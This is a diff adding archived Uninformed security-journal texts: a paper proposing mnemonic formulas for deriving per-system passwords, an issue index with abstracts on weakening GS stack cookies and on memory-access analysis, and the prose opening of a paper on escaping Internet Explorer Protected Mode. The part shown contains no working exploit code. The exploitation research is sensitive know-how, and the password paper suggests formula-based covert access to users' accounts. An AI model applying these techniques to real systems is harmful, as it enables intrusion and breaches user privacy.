http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24593.pdf; accessed 5/2/2007.
|
||||
|
||||
[2] Bala, Duesterwald, Banerija. Transparent Dynamic Optimization.
|
||||
http://www.hpl.hp.com/techreports/1999/HPL-1999-77.pdf; accessed 5/2/2007.
|
||||
|
||||
[3] Hewlett-Packard, MIT. DynamoRIO.
|
||||
http://www.cag.lcs.mit.edu/dynamorio/; accessed 4/30/2007.
|
||||
|
||||
[4] Horovitz, Oded. Memory Access Detection.
|
||||
http://cansecwest.com/core03/mad.zip; accessed 5/7/2007.
|
||||
|
||||
[5] Intel. Intel Architecture Software Developer's Manual Volume 3: System Programming.
|
||||
http://download.intel.com/design/PentiumII/manuals/24319202.pdf; accessed 5/1/2007.
|
||||
|
||||
[6] Microsoft Corporation. GetWriteWatch.
|
||||
http://msdn2.microsoft.com/en-us/library/aa366573.aspx; accessed 5/5/2007.
|
||||
|
||||
[7] Nethercote, Nicholas. Dynamic Binary Analysis and Instrumentation.
|
||||
http://valgrind.org/docs/phd2004.pdf; accessed 5/2/2007.
|
||||
|
||||
[8] PaX Team. PAGEEXEC.
|
||||
http://pax.grsecurity.net/docs/pageexec.txt; accessed 5/1/2007.
|
||||
|
||||
[9] Sparks, Butler. Shadow Walker: Raising the Bar for Rootkit Detection.
|
||||
https://www.blackhat.com/presentations/bh-jp-05/bh-jp-05-sparks-butler.pdf; accessed 5/3/2007.
|
||||
|
||||
[10] Stewart, Joe. Ollybone.
|
||||
http://www.joestewart.org/ollybone/; accessed 5/3/2007.
|
||||
|
||||
[11] Valgrind. Valgrind.
|
||||
http://valgrind.org/; accessed 4/30/2007.
|
||||
|
||||
[12] Amini, Pedram. PaiMei.
|
||||
http://pedram.redhive.com/PaiMei/docs/; accessed 5/10/2007.
|
491
uninformed/7.3.txt
Normal file
491
uninformed/7.3.txt
Normal file
|
@ -0,0 +1,491 @@
|
|||
Mnemonic Password Formulas
|
||||
I)ruid, C²ISSP
|
||||
druid@caughq.org
|
||||
http://druid.caughq.org
|
||||
5/2007
|
||||
|
||||
Abstract
|
||||
|
||||
The current information technology landscape is cluttered with a large
|
||||
number of information systems that each have their own individual
|
||||
authentication schemes. Even with single sign-on and multi-system
|
||||
authentication methods, systems within disparate management domains
|
||||
are likely to be utilized by users of various levels of involvement
|
||||
within the landscape as a whole. Due to this complexity and the
|
||||
abundance of authentication requirements, many users are required to
|
||||
manage numerous credentials across various systems. This has given rise to
|
||||
many different insecurities relating to the selection and management of
|
||||
passwords. This paper details a subset of issues facing users and managers of
|
||||
authentication systems involving passwords, discusses current approaches to
|
||||
mitigating those issues, and finally introduces a new method for password
|
||||
management and recalls termed Mnemonic Password Formulas.
|
||||
|
||||
1) The Problem
|
||||
|
||||
1.1) Many Authentication Systems
|
||||
|
||||
The current information systems landscape is cluttered with individual
|
||||
authentication systems. Even though many systems existing in a distinct
|
||||
management domain utilize single sign-on as well as multi-system
|
||||
authentication mechanisms, multiple systems within disparate management
|
||||
domains are likely to be utilized regularly by users. Even users at the most
|
||||
casual level of involvement in information systems can be expected to
|
||||
interface with a half a dozen or more individual authentication systems within
|
||||
a single day. On-line banking systems, corporate intranet web and database
|
||||
systems, e-mail systems, and social networking web sites are a few of the many
|
||||
systems that may require their own method of user authentication.
|
||||
|
||||
Due to the abundance of authentication systems, many end users are required to
|
||||
manage the large numbers of passwords needed to authenticate with these
|
||||
various systems. This issue has given rise to many common insecurities related
|
||||
to selection and management of passwords.
|
||||
|
||||
In addition to the prevalence of insecurities in password selection and
|
||||
management, advances in authentication and cryptography assemblages have
|
||||
instigated a shift in attack methodologies against authentication systems.
|
||||
While recent headway in computing power have made shorter passwords such as
|
||||
six characters or less (regardless of the complexity of their content)
|
||||
vulnerable to cracking by brute force[4], common attack methodologies are moving
|
||||
away from cryptanalytic and brute force methods against the password storage
|
||||
or authentication system in favor of intelligent guessing of passwords such
|
||||
as. This intelligent guessing might involved optimized dictionary attacks and
|
||||
user context guesses, attacks against other credentials required by the
|
||||
authentication system such as key-cards and password token devices, and
|
||||
attacks against the interaction between the user and the systems themselves.
|
||||
|
||||
Due to all of the aforementioned factors, the user's password is commonly the
|
||||
weakest link in any given authentication system.
|
||||
|
||||
1.2) Managing Multiple Passwords
|
||||
|
||||
Two of the largest problems with password authentication relate directly to
|
||||
the user and how the user manages passwords. First, when users are not allowed
|
||||
to write down their passwords, they generally will choose easy to remember
|
||||
passwords which are usually much easier to crack than complex passwords. In
|
||||
addition to choosing weaker passwords, users are more likely to re-use
|
||||
passwords across multiple authentication systems.
|
||||
|
||||
Users have an inevitably difficult time memorizing assigned random
|
||||
passwords[4] and passwords of a mandated higher level of complexity chosen
|
||||
themselves. When allowed, they may write down their passwords in an insecure
|
||||
location such as a post-it note stuck to their computer monitor or on a note
|
||||
pad in their desk. Alternatively, they may store passwords securely, such as
|
||||
a password encrypted file within a PDA. However, a user could just as easily
|
||||
lose access to the password store. The user may forget the password to the
|
||||
encrypted file, or the PDA could be lost or stolen. In this situation, the end
|
||||
result would require some administrative interaction in the form of issuing a
|
||||
password reset.
|
||||
|
||||
1.3) Poor Password Selection
|
||||
|
||||
When left to their own devices, users generally do not choose complex
|
||||
passwords[4] and tend to choose easy to crack dictionary words because they
|
||||
are easy to remember. Occasionally an attempt will be made at complexity by
|
||||
concatenating two words together or adding a number. In many cases, the word
|
||||
or words chosen will also be related to, or within the context of, the user
|
||||
themselves. This context might include things like a pet's name, phone
|
||||
number, or a birth date.
|
||||
|
||||
These types of passwords require much less effort to crack than a brute-force
|
||||
trial of the entire range of potential passwords. By using an optimized
|
||||
dictionary attack method, common words and phrases are tried first which
|
||||
usually leads to success. Due to the high success rate of this method, most
|
||||
modern attacks on authentication systems target guessing the password first
|
||||
before attempting to brute-force the password or launch an in-depth attack on
|
||||
the authentication system itself.
|
||||
|
||||
1.4) Failing Stupid
|
||||
|
||||
When a user cannot remember their password, likely because they have too many
|
||||
passwords to remember or the password was forced to be too complex for them to
|
||||
remember, many authentication systems provide a mechanism that the author has
|
||||
termed ``failing stupid.''
|
||||
|
||||
When the user ``fails stupid,'' they are asked a reminder question which is
|
||||
usually extremely easy for them to answer. If answered correctly, users are
|
||||
presented with an option to either reset their password, have it e-mailed to
|
||||
them, or perform some other password recovery method. When this type of
|
||||
recovery method is available, it effectively reduces the security of the
|
||||
authentication system from the strength of the password to the strength of a
|
||||
simple question. The answer to this question might even be obtainable through
|
||||
public information.
|
||||
|
||||
1.4.1) Case Study: Paris Hilton Screwed by Dog
|
||||
|
||||
A well publicized user context attack[2] was recently executed against the
|
||||
Hollywood celebrity Paris Hilton in which her cellular phone was compromised.
|
||||
The account password recovery question that she selected for use with her
|
||||
cellular provider's web site was "What is your favorite pet's name?" Many fans
|
||||
can most likely recollect from memory the answer to this question, not to
|
||||
mention fan web sites, message boards, and tabloids that likely have this
|
||||
information available to anyone that wishes to gather it. The attacker simply
|
||||
"failed stupid" and reset Hilton's online account password which then allowed
|
||||
access to her cellular device and its data.
|
||||
|
||||
2) Existing Approaches
|
||||
|
||||
2.1) Write Down Passwords
|
||||
|
||||
During the AusCERT 2005 information security conference, Jesper Johansson,
|
||||
Senior Program Manager for Security Policy at Microsoft, suggested[1] reversing
|
||||
decades of information security best practice of not writing down passwords.
|
||||
He claimed that the method of password security wherein users are prohibited
|
||||
from writing down passwords is absolutely wrong. Instead, he advocated
|
||||
allowing users to write down their passwords. The reasoning behind his claim
|
||||
is an attempt at solving one of the problems mentioned previously: when users
|
||||
are not allowed to write down their passwords they tend to choose easy to
|
||||
remember (and therefore easy to crack) passwords. Johansson believes that
|
||||
allowing users to write down their passwords will result in more complex
|
||||
passwords being used.
|
||||
|
||||
While Mr. Johansson correctly identifies some of the problems of password
|
||||
security, his approach to solving these conundrums is not only short-sighted,
|
||||
but also noncomprehensive. His solution solves users having to remember
|
||||
multiple complex passwords, but lso creates the aforementioned insecure
|
||||
scenarios regarding written passwords which are inherently physically less
|
||||
secure and prone to require administrative reset due to loss.
|
||||
|
||||
2.2) Mnemonic Passwords
|
||||
|
||||
A mnemonic password is a password that is easily recalled by utilizing a
|
||||
memory trick such as constructing passwords from the first letters of easily
|
||||
remembered phrases, poems, or song lyrics. An example includes using the
|
||||
first letters of each word in a phrase, such as: "Jack and Jill went up the
|
||||
hill," which results in the password "JaJwuth". For mnemonic passwords to be
|
||||
useful, the phrase must be easy for the user to remember.
|
||||
|
||||
Previous research has shown[4] that passwords built from phrase recollection like
|
||||
the example above yield passwords with complexity akin to true random
|
||||
character distribution. Mnemonic passwords share a weakness with regular
|
||||
passwords in that users may reuse them across multiple authentication systems.
|
||||
Such passwords are also commonly created using well known selections of text
|
||||
from famous literature or music lyrics. Password cracking dictionaries have
|
||||
been developed that contain many of these common mnemonics.
|
||||
|
||||
2.3) More Secure Mnemonic Passwords
|
||||
|
||||
More Secure Mnemonic Passwords[1] (MSMPs), are passwords that are derived from
|
||||
simple passwords which the user will remember with ease, however, they use
|
||||
mnemonic substitutions to give the password a more complex quality.
|
||||
``Leet-speaking'' a password is a simple example of this technique. For
|
||||
example, converting the passwords ``beerbash'' and ``catwoman'' into
|
||||
leet-speak would result in the passwords ``b33rb4sh'' and ``c@w0m4n'',
|
||||
respectively.
|
||||
|
||||
A unique problem of MSMPs is that not all passwords can be easily transformed
|
||||
which limits either the choice of available passwords or the password's
|
||||
seemingly complex quality. MSMPs also rely on permutations of an underlying
|
||||
dictionary words or sets of words which are easy to remember. Various cracking
|
||||
dictionaries have been developed to attack specific methods of permutations
|
||||
such as the "leet-speak" method mentioned above. As with mnemonic passwords,
|
||||
these passwords might be reused across multiple authentication systems.
|
||||
|
||||
2.4) Pass Phrases
|
||||
|
||||
Pass phrases[3] are essentially what is used as the root of a mnemonic password.
|
||||
They are easier to remember and much longer which results in a password being
|
||||
much more resilient to attack by brute force. Pass phrases tend to be much
|
||||
more complex due to the use of upper and lower case characters, white-space
|
||||
characters, as well as special characters like punctuation and numbers.
|
||||
|
||||
However, pass phrases have their own sets of problems. Many authentication
|
||||
systems do not support lengthy authentication tokens, thus resulting in pass
|
||||
phrases that are not consistently usable. Like the aforementioned methods,
|
||||
the same pass phrase may be reused across multiple authentication systems.
|
||||
|
||||
3) Mnemonic Password Formulas
|
||||
|
||||
3.1) Definition
|
||||
|
||||
A Mnemonic Password Formula, or MPF, is a memory technique utilizing a
|
||||
predefined, memorized formula to construct a password on the fly from various
|
||||
context information that the user has available.
|
||||
|
||||
3.2) Properties
|
||||
|
||||
Given a well designed MPF, the resultant password should have the following
|
||||
properties:
|
||||
|
||||
- A seemingly random string of characters
|
||||
- Long and very complex, therefore difficult to crack via brute force
|
||||
- Easy to reconstruct by a user with knowledge of only the formula,
|
||||
themselves, and the target authentication system
|
||||
- Unique for each user, class of access, and authenticating system
|
||||
|
||||
3.3) Formula Design
|
||||
|
||||
3.3.1) Syntax
|
||||
|
||||
For the purposes of this paper, the following formula syntax will be used:
|
||||
|
||||
- <X> : An element, where <X> is meant to be entirely replaced by something known as described by X.
|
||||
- | : When used within an element's angle brackets (< and >), represents an OR value choice.
|
||||
- All other characters are literal.
|
||||
|
||||
3.3.2) A Simple MPF
|
||||
|
||||
The following simple formula should be sufficient to demonstrate the MPF
|
||||
concept. Given the authenticating user and the corresponding authenticating
|
||||
system, a formula like that shown in the following example could be
|
||||
constructed. This example formula contains two elements: the user and
|
||||
the target system identified either by hostname or the most significant octet
|
||||
of the IP address.
|
||||
|
||||
<user>!<hostname|lastoctet>
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "druid!neo" for user druid at system neo.jpl.nasa.gov
|
||||
- "intropy!intropy" for user intropy at system intropy.net
|
||||
- "thegnome!nmrc" for user thegnome at system nmrc.org
|
||||
- "druid!33" for user druid at system 10.0.0.33
|
||||
|
||||
This simple MPF schema creates fairly long, easy to remember, passwords that
|
||||
contain a special character. However, it does not yield very complex
|
||||
passwords. A diligent attacker may include the target user and hostname as
|
||||
some of the first combinations of dictionary words used in a brute force
|
||||
attack against the password. Due to the fact that only the hostname or last
|
||||
octet of the IP address is used as a component of the schema, passwords may
|
||||
not be unique per system. If the same user has an account on two different web
|
||||
servers, both with hostname "www", or two different servers with the same last
|
||||
address octet value within two different sub-nets, the resultant passwords
|
||||
will be identical. Finally, the passwords yielded are variable in length and
|
||||
may not comply with a given systems password length policies.
|
||||
|
||||
3.3.3) A More Complex MPF
|
||||
|
||||
By modifying the simple MPF above, complexity can be improved. Given the
|
||||
authenticating user and the authenticating system, an MPF with the following
|
||||
components can be constructed:
|
||||
|
||||
<u>!<h|n>.<d,d,...|n,n,...>
|
||||
|
||||
The more complex MPF contains three elements: <u> represents the first letter
|
||||
of the username, <h|n> represents the first letter of the hostname or first
|
||||
number of the first address octet, and <d,d,...|n,n,...> represents the first
|
||||
letters of the remaining domain name parts or first numbers of the remaining
|
||||
address octets, concatenated together. This MPF also contains another special
|
||||
character in addition to the exclamation mark, the period between the second
|
||||
and third element.
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "d!n.jng" for user druid at system neo.jpl.nasa.gov
|
||||
- "i!i.n" for user intropy at system intropy.net
|
||||
- "t!n.o" for user thegnome at system nmrc.org
|
||||
- "d!1.003" for user druid at system 10.0.0.33
|
||||
|
||||
The modified MPF contains two special characters which yields more complex
|
||||
passwords, however, the passwords are still variable length and may not comply
|
||||
with the authenticating system's password length policies. The example MPF is
|
||||
also increasing in complexity and may not be easily remembered.
|
||||
|
||||
3.3.4) Design Goals
|
||||
|
||||
The ideal MPF should meet as many of the following design goals as possible:
|
||||
|
||||
- Contain enough elements and literals to always yield a minimum password
|
||||
length
|
||||
- Contain enough complex elements and literals such as capital letters and
|
||||
special characters to yield a complex password
|
||||
- Elements must be unique enough to yield a unique password per
|
||||
authenticating system
|
||||
- Must be easily remembered by the user
|
||||
|
||||
3.3.5) Layered Mnemonics
|
||||
|
||||
Due to the fact that MPFs can become fairly complex while attempting to meet
|
||||
the first three design goals listed above, a second layer of mnemonic
|
||||
properties can be applied to the MPF. The MPF, by definition, is a mnemonic
|
||||
technique due to its property of allowing the user to reconstruct the password
|
||||
for any given system by remembering only the MPF and having contextual
|
||||
knowledge of themselves and the system. Other mnemonic techniques can be
|
||||
applied to help remember the MPF itself. This second layer of mnemonics may
|
||||
also be tailored to the user of the MPF.
|
||||
|
||||
Given the authenticating user and the authenticating system, an adequately
|
||||
complex, long, and easy to remember MPF like the following could be
|
||||
constructed:
|
||||
|
||||
<u>@<h|n>.<d|n>;
|
||||
|
||||
This MPF contains three elements: <u> represents the first letter of the
|
||||
username, <h|n> represents the first letter of the hostname or first number of
|
||||
the first address octet, and <d|n> represents the last letter of the domain
|
||||
name suffix or last number of the last address octet. The modified MPF also
|
||||
contains a third special character in addition to the exclamation mark and
|
||||
period: the semicolon after the final element.
|
||||
|
||||
The above MPF would yield such passwords as:
|
||||
|
||||
- "d@n.v;" for user druid at system neo.jpl.nasa.gov
|
||||
- "i@i.t;" for user intropy at system intropy.net
|
||||
- "t@n.g;" for user thegnome at system nmrc.org
|
||||
- "d@1.3;" for user druid at 10.0.0.33
|
||||
|
||||
Unlike the previously discussed MPFs, the one mentioned above employs a
|
||||
secondary mnemonic technique by reading in a natural way and is thus easier
|
||||
for a user to remember. The MPF can be read and remembered as ``user at host
|
||||
dot domain,'' which is equatable to the structural format of an email address.
|
||||
Also, a secondary mnemonic technique specific to the user of this MPF was used
|
||||
by appending the literal semicolon character. This MPF was designed by a C
|
||||
programmer who would naturally remember to terminate her passwords with
|
||||
semicolons.
|
||||
|
||||
3.3.6) Advanced Elements
|
||||
|
||||
MPFs can be made even more complex through use of various advanced elements.
|
||||
Unlike simple elements which are meant to be replaced entirely by some static
|
||||
value like a username, first letter of a username, or some part of the
|
||||
hostname, advanced elements such as repeating elements, variable elements, and
|
||||
rotating or incrementing elements can be used to vastly improve the MPF's
|
||||
output complexity. Note, however, that overuse of these types of elements may
|
||||
cause the MPF to not meet design goal number four by making the MPF too
|
||||
difficult for the user to remember.
|
||||
|
||||
- Repeating Elements
|
||||
|
||||
MPFs may yield longer passwords by repeating simple elements. For
|
||||
example, an element such as the first letter of the hostname may be
|
||||
used twice:
|
||||
|
||||
<u>@<h|n><h|n>.<d>;
|
||||
|
||||
Such repeating elements are not required to be sequential, and
|
||||
therefore may be inserted at any point within the MPF.
|
||||
|
||||
- Variable Elements
|
||||
|
||||
MPFs can yield more complex passwords by including variable elements. For
|
||||
example, the MPF designer can prepend the characters "p:" or "b:" to the
|
||||
beginning of the to include an element indicating whether the target system
|
||||
is a personal or business.
|
||||
|
||||
<p|b>:<u>@<h|n>.<d|n>;
|
||||
|
||||
To further expand this example, consider a user who performs system
|
||||
administration work for multiple entities. In this case the variable
|
||||
element being prepended could be the first letter of the system's managing
|
||||
entity:
|
||||
|
||||
<x>:<u>@<hi|n>.<d|n>;
|
||||
|
||||
<x> could be replaced by ``p'' for a personal system, ``E'' for a system
|
||||
within Exxon-Mobil's management domain, or ``A'' for a system managed by
|
||||
the Austin Hackers Association. Most of the elements used thus far are
|
||||
relatively simple variable elements that derive their value from other
|
||||
known contextual information such as user or system name. The contrast is
|
||||
that elements are capricious only in how their value changes when the MPF
|
||||
is applied to different systems. Variable elements change values in
|
||||
relation to the context of the class of access or due to a number of other
|
||||
factors outside the basic ``user/system'' context.
|
||||
|
||||
|
||||
To illustrate this concept, the use of the same MPF for a super-user and an
|
||||
unprivileged user account on the same system may result in passwords that
|
||||
only differ slightly. Including a variable element can help to mitigate
|
||||
this similarity. Prepending the characters ``0:'' or ``1:'' to the
|
||||
resultant password to indicate super-user versus unprivileged user access.
|
||||
Respectively, by inclusion of an additional variable element in the MPF
|
||||
will result in the password's increased complexity as well as indicating
|
||||
class of access:
|
||||
|
||||
Variable elements are not required to prepend the beginning of the formula
|
||||
as with the examples above; they can be easily appended or inserted
|
||||
anywhere within the MPF.
|
||||
|
||||
- Rotating and Incrementing Elements
|
||||
|
||||
Rotating and incrementing elements can be included to assist in managing
|
||||
password changes required to conform to password rotation policies. A
|
||||
rotating element is one which rotates through a predefined list of values
|
||||
such as "apple", "orange", "banana", etc. An incrementing element such as
|
||||
the one represented below by is derived from an open-ended linear sequence
|
||||
of values incremented through such as "1", "2", "3" or "one", "two",
|
||||
"three". When a password rotation policy dictates that a password must be
|
||||
changed, rotate or increment the appropriate elements:
|
||||
|
||||
<u>@<h|n>.<d|n>;<\#>
|
||||
|
||||
The above MPF results in passwords like "d@c.g:1", "d@c.g:2", "d@c.g:3",
|
||||
etc. To further illustrate this principle, consider the following MPF:
|
||||
|
||||
<u>@<h|n>.<d|n>;<fruit>
|
||||
|
||||
The above MPF, when used with the predefined list of fruit values mentioned
|
||||
above, yields passwords like "d@c.g:apple", "d@c.g:orange", "d@c.g:banana",
|
||||
etc.
|
||||
|
||||
The only additional pieces of information that the user must remember other
|
||||
than the MPF itself is the predefined list of values in the rotating
|
||||
element, and the current value of the rotating or incrementing element.
|
||||
|
||||
In the case of rotating elements this list of values may potentially be
|
||||
written down for easy reference without compromising the security of the
|
||||
password itself. Lists may further be obscured by utilizing certain
|
||||
values, like a grocery list or a list of company employees and telephone
|
||||
extensions that may already be posted within the user's environment. In
|
||||
the case of incrementing elements, knowledge of the current value should be
|
||||
all that is required to determine the next value.
|
||||
|
||||
3.4) Enterprise Considerations
|
||||
|
||||
Large organizations could use MPFs assigned to specific users to facilitate
|
||||
dual-access to a user's accounts across the enterprise. If the enterprise's
|
||||
Security Operations group assigns unique MPFs to it's users, Security Officers
|
||||
would then be able to access the user's accounts without intrusively modifying
|
||||
the user's account or password. This type of management could be used for
|
||||
account access when user is absent or indisposed, shared account access among
|
||||
multiple staff members or within an operational group, or even surveillance of
|
||||
a suspected user by the Security Operations group.
|
||||
|
||||
3.5) Weaknesses
|
||||
|
||||
3.5.1) The ``Skeleton Key'' Effect
|
||||
|
||||
The most significant weakness of passwords generated by MPFs is that when the
|
||||
formula becomes compromised, all passwords to systems for which the user is
|
||||
using the respective MPF schema are potentially compromised. This situation is
|
||||
no worse than a user simply using the same password on all systems. In fact,
|
||||
it is significantly better due to the resultant passwords being individually
|
||||
unique. When using a password generated by an MPF, the password should be
|
||||
unique per system and ideally appear to be a random string of characters. In
|
||||
order to compromise the formula, an attacker would likely have to crack a
|
||||
significant number of system's passwords which were generated by the formula
|
||||
before being able to identify the correlation between them.
|
||||
|
||||
3.5.2) Complexity Through Password Policy
|
||||
|
||||
A second weakness of MPF generated passwords is that without rotating or
|
||||
incrementing elements, they are not very resilient to password expiration or
|
||||
rotation policies. There exists a trade-off between increased password
|
||||
security via expiring passwords and MPF complexity. However, the trade-off is
|
||||
either to have both, or neither. The more secure option is to use both,
|
||||
however, this practice increases the complexity of the MPF potentially causing
|
||||
the it to not meet design goal number four.
|
||||
|
||||
6) Conclusion
|
||||
|
||||
MPFs can effectively mitigate many of the existing risks of complex password
|
||||
selection and management by users. However, their complexity and mnemonic
|
||||
properties must be managed very carefully in order to achieve a comfortable
|
||||
level of password security while also maintaining memorability. Users may
|
||||
reintroduce many of the problems MPFs intend to solve when they become too
|
||||
complex for users to easily remember.
|
||||
|
||||
References
|
||||
|
||||
[1] Bugaj, Stephan Vladimir. More Secure Mnemonic-Passwords: User-Friendly Passwords for Real Humans
|
||||
http://www.cs.uno.edu/Resources/FAQ/faq4.html
|
||||
|
||||
[2] Kotadia, Munir. Microsoft Security Guru: Jot Down Your Passwords
|
||||
http://news.com.com/Microsoft+security+guru+Jot+down+your+passwords/2100-7355_3-5716590.html
|
||||
|
||||
[3] McWilliams, Brian. How Paris Got Hacked?
|
||||
http://www.macdevcenter.com/pub/a/mac/2005/01/01/paris.html
|
||||
|
||||
[4] Williams, Randall T. The Passphrase FAQ
|
||||
http://www.iusmentis.com/security/passphrasefaq/
|
||||
|
||||
[5] Jeff Jianxin Yan and Alan F. Blackwell and Ross J. Anderson and Alasdair Grant. Password Memorability and Security: Empirical Results
|
||||
http://doi.ieeecomputersociety.org/10.1109/MSP.2004.81
|
19
uninformed/7.txt
Normal file
19
uninformed/7.txt
Normal file
|
@ -0,0 +1,19 @@
|
|||
|
||||
|
||||
Exploitation Technology
|
||||
Reducing the Effective Entropy of GS Cookies
|
||||
skape
|
||||
This paper describes a technique that can be used to reduce the effective entropy in a given GS cookie by roughly 15 bits. This reduction is made possible because GS uses a number of weak entropy sources that can, with varying degrees of accuracy, be calculated by an attacker. It is important to note, however, that the ability to calculate the values of these sources for an arbitrary cookie currently relies on an attacker having local access to the machine, such as through the local console or through terminal services. This effectively limits the use of this technique to stack-based local privilege escalation vulnerabilities. In addition to the general entropy reduction technique, this paper discusses the amount of effective entropy that exists in services that automatically start during system boot. It is hypothesized that these services may have more predictable states of entropy due to the relative consistency of the boot process. While the techniques described in this paper do not illustrate a complete break of GS, any inherent weakness can have disastrous consequences given that GS is a static, compile-time security solution. It is not possible to simply distribute a patch. Instead, applications must be recompiled to take advantage of any security improvements. In that vein, the paper proposes some solutions that could be applied to address the problems that are outlined.
|
||||
pdf | code.tgz | html | txt
|
||||
|
||||
General Research
|
||||
Memalyze: Dynamic Analysis of Memory Access Behavior in Software
|
||||
skape
|
||||
This paper describes strategies for dynamically analyzing an application's memory access behavior. These strategies make it possible to detect when a read or write is about to occur at a given location in memory while an application is executing. An application's memory access behavior can provide additional insight into its behavior. For example, it may be able to provide an idea of how data propagates throughout the address space. Three individual strategies which can be used to intercept memory accesses are described in this paper. Each strategy makes use of a unique method of intercepting memory accesses. These methods include the use of Dynamic Binary Instrumentation (DBI), x86 hardware paging features, and x86 segmentation features. A detailed description of the design and implementation of these strategies for 32-bit versions of Windows is given. Potential uses for these analysis techniques are described in detail.
|
||||
pdf | code.tgz | html | txt
|
||||
|
||||
Mnemonic Password Formulas
|
||||
I)ruid
|
||||
The current information technology landscape is cluttered with a large number of information systems that each have their own individual authentication schemes. Even with single sign-on and multi-system authentication methods, systems within disparate management domains are likely to be utilized by users of various levels of involvement within the landscape as a whole. Due to this complexity and the abundance of authentication requirements, many users are required to manage numerous credentials across various systems. This has given rise to many different insecurities relating to the selection and management of passwords. This paper details a subset of issues facing users and managers of authentication systems involving passwords, discusses current approaches to mitigating those issues, and finally introduces a new method for password management and recalls termed Mnemonic Password Formulas.
|
||||
pdf | html | txt
|
||||
|
1723
uninformed/8.1.txt
Normal file
1723
uninformed/8.1.txt
Normal file
File diff suppressed because it is too large
Load diff
1111
uninformed/8.2.txt
Normal file
1111
uninformed/8.2.txt
Normal file
File diff suppressed because it is too large
Load diff
362
uninformed/8.3.txt
Normal file
362
uninformed/8.3.txt
Normal file
|
@ -0,0 +1,362 @@
|
|||
Getting out of Jail: Escaping Internet Explorer Protected Mode
|
||||
September, 2007
|
||||
Skywing
|
||||
Skywing@valhallalegends.com
|
||||
http://www.nynaeve.net
|
||||
|
||||
Abstract: With the introduction of Windows Vista, Microsoft has added a new
|
||||
form of mandatory access control to the core operating system. Internally
|
||||
known as "integrity levels", this new addition to the security manager allows
|
||||
security controls to be placed on a per-process basis. This is different from
|
||||
the traditional model of per-user security controls used in all prior versions
|
||||
of Windows NT. In this manner, integrity levels are essentially a bolt-on to
|
||||
the existing Windows NT security architecture. While the idea is
|
||||
theoretically sound, there does exist a great possibility for implementation
|
||||
errors with respect to how integrity levels work in practice. Integrity
|
||||
levels are the core of Internet Explorer Protected Mode, a new "low-rights"
|
||||
mode where Internet Explorer runs without permission to modify most files or
|
||||
registry keys. This places both Internet Explorer and integrity levels as a
|
||||
whole at the forefront of the computer security battle with respect to Windows
|
||||
Vista.
|
||||
|
||||
1) Introduction
|
||||
|
||||
Internet Explorer Protected Mode is a reduced-rights operational mode of
|
||||
Internet Explorer where the security manager itself enforces a policy of not
|
||||
allowing write access to most file system, registry, and other securable
|
||||
objects by default. This mode does provide special sandbox file system and
|
||||
registry space that is permitted to be written to by Internet Explorer when
|
||||
operating in Protected Mode.
|
||||
|
||||
While there exist some fundamental shortcomings of Protected Mode as it is
|
||||
currently implemented, such as an inability to protect user data from being
|
||||
read by a compromised browser process, it has been thought to be effective at
|
||||
blocking most write access to the system from a compromised browser. The
|
||||
benefit of this is that if one is using Internet Explorer and a buffer overrun
|
||||
occurs within IExplore.exe, the persistent impact should be lessened. For
|
||||
example, instead of having write access to everything accessible to the user's
|
||||
account, exploit code would instead be limited to being able to write to the
|
||||
low integrity section of the registry and the low integrity temporary files
|
||||
directories. This greatly impacts the ability of malware to persist itself or
|
||||
compromise a computer beyond just IExplore.exe without some sort of user
|
||||
interaction (such as persuading a user to launch a program from an untrusted
|
||||
location with full rights, or other social engineering attacks).
|
||||
|
||||
2) Protected Mode and Integrity Levels
|
||||
|
||||
Internally, Protected Mode is implemented by running IExplore.exe as a low
|
||||
integrity process. With the default security descriptor that is applied to
|
||||
most securable objects, low integrity processes may not generally request
|
||||
access rights that map to GENERIC_WRITE for a particular object. As Internet
|
||||
Explorer does need to be able to persist some files and settings, exceptions
|
||||
can (and are) carved out for low integrity processes in the form of registry
|
||||
keys and directories with special security descriptors that grant the ability
|
||||
for low integrity processes to request write access. Because the IExplore
|
||||
process cannot write files to a location that would be automatically used
|
||||
by a higher integrity process, and it cannot request dangerous access
|
||||
rights to other running processes (such as the ability to inject code via
|
||||
requesting PROCESS_VM_WRITE or the like), malware that runs in the context of
|
||||
a compromised IExplore process is (theoretically) fairly contained from the
|
||||
rest of the system.
|
||||
|
||||
However, this containment only holds as long as the system happens to be free
|
||||
of implementation errors. Alas, but perhaps not unexpectedly, there are in
|
||||
fact implementation problems in the way the system manages processes running
|
||||
at differing integrity levels that can be leveraged to break out of the
|
||||
Protected Mode (or low integrity) jail. To understand these implementation
|
||||
errors, it is first necessary to gain a basic working understanding of how the
|
||||
new integrity-based security model works in Windows. The integrity model is
|
||||
key to a number of Windows Vista features, including UAC (User Account
|
||||
Control).
|
||||
|
||||
When a user logs on to a computer in Windows Vista with UAC enabled, their
|
||||
shell is normally started as a ``medium'' integrity process. Integrity levels
|
||||
are integers and symbolic designations such as ``low'', ``medium'', ``high'',
|
||||
or ``system'' are simply used to indicate certain well-known intermediate
|
||||
values). Medium integrity is the default integrity level even for built-in
|
||||
administrators (except the default ``Administrator'' account, which is a
|
||||
special case and is exempted from UAC). Most day to day activity is intended
|
||||
to be performed at medium integrity; for instance, a word processor program
|
||||
would be expected to operate at medium integrity, and (theoretically) games
|
||||
would generally run at medium integrity as well. Games tend to be rather
|
||||
poorly written in terms of awareness of the security system, however, so this
|
||||
tends to not really be the case, at least not without added help from the
|
||||
operating system. Medium integrity roughly corresponds to the environment
|
||||
that a limited user would run as under previous versions of Windows. That is
|
||||
to say, the user has read and write access to their own user profile and their
|
||||
own registry hive, but not write access to the system as a whole.
|
||||
|
||||
Now, when a user launches Internet Explorer, an IExplore.exe process is
|
||||
launched as low integrity. The default security descriptor for most objects
|
||||
on Windows prevents low integrity processes from gaining write access to
|
||||
medium integrity securable objects, as previously mentioned. In reality, the
|
||||
default security descriptor denies write access to higher integrities, not
|
||||
just to medium integrity, though in this case the effect is similar in terms
|
||||
of Internet Explorer. As a result, the IExplore.exe process cannot write
|
||||
directly to most locations on the system.
|
||||
|
||||
However, Internet Explorer does, in certain cases, need to gain write to
|
||||
locations outside of the low integrity (Protected Mode) sandbox. For this
|
||||
task, Internet Explorer relies on a helper process, known as ieuser.exe, which
|
||||
runs at medium integrity level. There is a tightly controlled RPC interface
|
||||
between ieuser.exe and IExplore.exe that allows Internet Explorer, running at
|
||||
low integrity, to request that ieuser.exe display a dialog box asking the user
|
||||
to, say, choose a save location for a file and then save said file to disk.
|
||||
This is the mechanism by which one can save files in their home directory even
|
||||
